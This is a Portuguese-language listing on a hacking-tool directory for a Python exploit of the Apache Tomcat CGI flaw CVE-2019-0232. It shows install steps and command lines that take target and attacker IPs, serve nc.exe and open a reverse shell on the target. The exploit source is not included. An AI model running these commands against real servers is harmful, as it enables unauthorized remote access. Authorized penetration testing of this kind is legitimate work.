Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-0232_tomcat_cgi_exploit | Kitploit
Ferramentas/GitHubGitHub/x3m1sec/cve-2019-0232_tomcat_cgi_exploit
Geração de PayloadsExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubx3m1sec/cve-2019-0232_tomcat_cgi_exploit

CVE-2019-0232_tomcat_cgi_exploit

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 1 anoAinda não revisado

Script de Exploit CGI do Apache Tomcat

Descrição

Um script em Python projetado para explorar vulnerabilidades CGI em servidores Apache Tomcat por meio da execução de uma conexão de shell reverso.

Exemplo de Uso

Exemplo de Execução do Script

Características

  • Exploit automatizado para vulnerabilidades CGI do Apache Tomcat
  • Parâmetros de alvo e atacante personalizáveis
  • Interface de linha de comando simples

Pré-requisitos

  • Python 3.x
  • Biblioteca requests
  • Netcat (nc.exe)
  • Acesso a um listener para receber o shell reverso

Instalação

root@kitploit:~
git clone <url-do-repositorio>
cd <diretorio-do-repositorio>
pip install requests

Uso

root@kitploit:~
python3 tomcat_cgi_exploit.py -t <IP_ALVO> -i <IP_ATACANTE> -ncp <PORTA_SHELL_REVERSO>

Argumentos Obrigatórios

  • -t, --target: Endereço IP do alvo com Apache Tomcat
  • -i, --ip: Endereço IP do atacante que hospeda o nc.exe
  • -ncp, --nc-port: Porta para a conexão do shell reverso

Argumentos Opcionais

  • -p, --port: Porta do alvo (padrão: 8080)
  • -sp, --server-port: Porta do servidor para hospedar o nc.exe (padrão: 80)
  • -cgi, --cgi-script: Nome do script CGI a ser explorado (padrão: cmd.bat)

Exemplo

root@kitploit:~
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e testes de penetração autorizados. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este script. Sempre obtenha autorização adequada antes de testar qualquer sistema.

Autor

  • Jose Miguel Romero (k3Pn1c)
Baixar ferramenta